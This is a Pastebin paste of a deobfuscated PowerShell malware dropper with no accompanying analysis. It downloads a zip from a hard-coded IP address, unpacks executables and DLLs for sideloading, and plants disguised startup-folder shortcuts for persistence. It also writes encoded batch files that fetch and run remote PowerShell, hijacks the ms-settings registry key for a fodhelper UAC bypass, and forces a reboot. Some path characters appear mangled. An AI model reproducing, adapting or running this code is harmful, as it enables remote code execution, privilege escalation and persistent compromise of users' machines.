Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ${var0} = 'cmd'
- ${var1} = 'exe'
- ${var2} = '.png'
- ${var3} = 'zip'
- ${var4} = 'http://51.38.235.152/20/a/m/m.zip'
- ${var5} = 'public'
- ${var6} = 'c:\users\'
- ${var7} = "${var6}${var5}"
- ${var10} = 'Global'
- ${var11} = 'DllCall'
- ${var12} = 'STRUCT'
- ${var13} = 'JLI_GetStdArgc'
- ${var14} = 'DllOpen'
- ${var15} = '#NoTrayIcon'
- ${var16} = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
- ${var17} = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "'
- ${var18} = 'DelegateExecute'
- ${var19} = '(default)'
- ${var20} = 'C:\Windows\System32\fodhelper.exe'
- ${var21} = 'fodhelper.exe'
- ${var22} = '\\?\C:\Windows \System32\'
- ${var23} = '1n ia'
- ${var24} = 'C:\'
- ${var25} = '.txt'
- ${var26} = '.dll'
- ${var27} = '.exe'
- ${var28} = 'jli'
- ${var29} = 'MSVCR100'
- ${var30} = 'WebView2Loader'
- ${var31} = $env:COMPUTERNAME
- ${var32} = "030723"
- Function ____bbbbbbbbaaababababa_____ {
- ${var33} = "q","w","e","r","t","y","u","p","a","s","d","f","g","h","j","k","z","x","c","v","b","n","m"
- ${var34} = "2_","3_","4_","5_","6_","7_","8_","9_"
- ${var35} = $null
- ${var36} = Get-Random -InputObject ${var33} -Count 6
- ${var38} = Get-Random -InputObject ${var34} -Count 1
- ${var40} = Get-Random -InputObject ${var33}.ToUpper() -Count 1
- foreach($n in ${var36}) {
- ${var35} += $n
- }
- foreach ($n2 in ${var38}) {
- ${var35} += $n2
- }
- foreach ($n3 in ${var40}) {
- ${var35} += $n3
- }
- return "_${var35}"
- }
- ${var49} = ____bbbbbbbbaaababababa_____
- ${var50} = ${var49}
- ${var52} = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28:bb@22@10@18@24@2@3.@12@24@22b@10b@0@8b@1@5@0@8@2@2b@30@25b@30@25') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -"
- ${var53} = "${var7}a${var32}"
- if ((${var53} | Test-Path)) {var57}
- New-Item -ItemType directory -Path "${var24}${var49}"
- ${var60} = "${var24}${var49}a${var31}"
- ${var64} = ${var52}
- ${var64} | Set-Content ${var60}${var50}
- ${var69} = (${var49})
- ${var71} = (${var49} + "A")
- ${var73} = (${var49} + "B")
- del ${var7}a*.vbs
- del ${var7}a*.lnk
- del ${var7}a*.exe
- del ${var7}a*.cmd
- ${var79} = "${var7}a${var31}${var50}.${var0}"
- ${var84} = "@Echo off`r`n"
- ${var84} += "Setlocal EnableExtensions`r`n"
- ${var84} += "Setlocal EnableDelayedExpansion`r`n"
- ${var84} += "cd %SystemRoot%aSystem32`r`n"
- ${var84} += "Set bP ${var49}=<`"${var60}${var50}`"`r`n"
- ${var84} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"
- ${var84} += "for bL %%N in (10 1 36) do (`r`n"
- ${var84} += "for bF %%C in (`"!chars:~%%N,1!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:%%N=%%C!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += ")`r`n"
- ${var84} += ")`r`n"
- ${var84} += "for bF %%F in (`"!${var49}!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:@=!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += "for bF %%F in (`"!${var49}!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:`"=!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += "%${var49}%`r`n"
- ${var84} | Set-Content ${var79}
- function _____ba_baba_bab=aaaaaaaaaabbbbb
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var24}${var49}a${var49}.${var1}"
- ${var120}.Arguments = "${var24}${var49}a${var49}.ai"
- ${var120}.WorkingDirectory = "${var24}${var49}a"
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- function _____ba_baba_bab=aaaaaaaaaabbbbbaaaaaaaaaaaaaaaaaaaaaaa
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var24}${var49}a${var49}.${var1}"
- ${var120}.Arguments = "${var24}${var49}a${var49}.at"
- ${var120}.WorkingDirectory = "${var24}${var49}a"
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- ${var163} = "${var22}"
- New-Item ${var163} -ItemType Directory
- Copy-Item -Path "${var20}" -Destination "${var163}${var21}" -Recurse
- function _____ba_baba_bab=aaaaaaaaaabbbbbaaaaaaaaaaaaaaaaaaaaaaa____aaa
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var24}${var49}a${var49}i7${var27}"
- ${var120}.Arguments = ""
- ${var120}.WorkingDirectory = "${var24}"
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- function _____ba_baba_bab=a
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var79}"
- ${var120}.Arguments = ""
- ${var120}.WorkingDirectory = ""
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- ${var203} = New-Object -Com WScript.Shell
- ${var204} = ${var203}.SpecialFolders.Item('startup');
- del ${var204}a*.vbs
- del ${var204}a*.lnk
- del ${var204}a*.exe
- del ${var204}a*.cmd
- ${var210} = " $env:APPDATAa${var211}, ${var212}"
- ${var213} = "${var204}a${var49}.lnk"
- _____ba_baba_bab=a ${var213} ${var210}
- ${var213} = "${var204}a${var49}EX.lnk"
- _____ba_baba_bab=aaaaaaaaaabbbbb ${var213} ${var210}
- ${var213} = "${var204}a${var49}AT.lnk"
- _____ba_baba_bab=aaaaaaaaaabbbbbaaaaaaaaaaaaaaaaaaaaaaa ${var213} ${var210}
- ${var213} = "${var204}a${var49}AA.lnk"
- _____ba_baba_bab=aaaaaaaaaabbbbbaaaaaaaaaaaaaaaaaaaaaaa____aaa ${var213} ${var210}
- ${var52} = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28:bb@22@10@18@24@2@3.@12@24@22b@10b@0@8b@1@5@0@8@2@2b@10@30b@10@30') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -"
- ${var49} = ${var49}
- ${var60} = "${var24}${var49}a${var31}"
- ${var64} = ${var52}
- ${var64} | Set-Content ${var60}${var50}y
- ${var69} = (${var49})
- ${var71} = (${var49} + "A")
- ${var73} = (${var49} + "B")
- ${var79} = "${var7}a${var31}${var50}y.${var0}"
- ${var84} = "@Echo off`r`n"
- ${var84} += "Setlocal EnableExtensions`r`n"
- ${var84} += "Setlocal EnableDelayedExpansion`r`n"
- ${var84} += "cd %SystemRoot%aSystem32`r`n"
- ${var84} += "Set bP ${var49}=<`"${var60}${var50}y`"`r`n"
- ${var84} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"
- ${var84} += "for bL %%N in (10 1 36) do (`r`n"
- ${var84} += "for bF %%C in (`"!chars:~%%N,1!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:%%N=%%C!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += ")`r`n"
- ${var84} += ")`r`n"
- ${var84} += "for bF %%F in (`"!${var49}!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:@=!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += "for bF %%F in (`"!${var49}!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:`"=!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += "%${var49}%`r`n"
- ${var84} | Set-Content ${var79}
- function _____ba_baba_bab=abb
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var79}"
- ${var120}.Arguments = ""
- ${var120}.WorkingDirectory = ""
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- ${var203} = New-Object -Com WScript.Shell
- ${var204} = ${var203}.SpecialFolders.Item('startup');
- ${var210} = " $env:APPDATAa${var211}, ${var212}"
- ${var213} = "${var204}a${var49}y.lnk"
- _____ba_baba_bab=abb ${var213} ${var210}
- ${var315} = ${var49}
- ${var315} | Set-Content "${var7}a${var32}"
- ${var315} | Out-File "${var7}a${var32}"
- ${var315} > "${var7}a${var32}"
- ${var326} = new-object System.Net.WebClient
- ${var326}.DownloadFile(${var4},"${var24}${var49}a${var49}.${var49}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.zip") -Path ("${var24}${var49}a${var49}.${var49}")
- Expand-Archive -Path "${var24}${var49}a${var49}.${var3}" -DestinationPath "${var24}${var49}"
- Rename-Item -NewName ("${var24}${var49}a${var49}.${var1}") -Path ("${var24}${var49}a${var1}${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.ia") -Path ("${var24}${var49}a6${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.ai") -Path ("${var24}${var49}ab${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.at") -Path ("${var24}${var49}ac${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.mdat") -Path ("${var24}${var49}aat${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}i7${var27}") -Path ("${var24}${var49}ai7${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var28}${var26}") -Path ("${var24}${var49}a${var28}${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var29}${var26}") -Path ("${var24}${var49}a${var29}${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var30}${var26}") -Path ("${var24}${var49}a${var30}${var25}")
- del ${var24}${var49}a*.zip
- # Create reg structure
- New-Item "${var16}" -Force
- New-ItemProperty -Path "${var16}" -Name "${var18}" -Value "" -Force
- # Place command in
- Set-ItemProperty -Path "${var16}" -Name "${var19}" -Value "${var24}${var49}a${var49}i7${var27}" -Force
- shutdown br bt 10
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
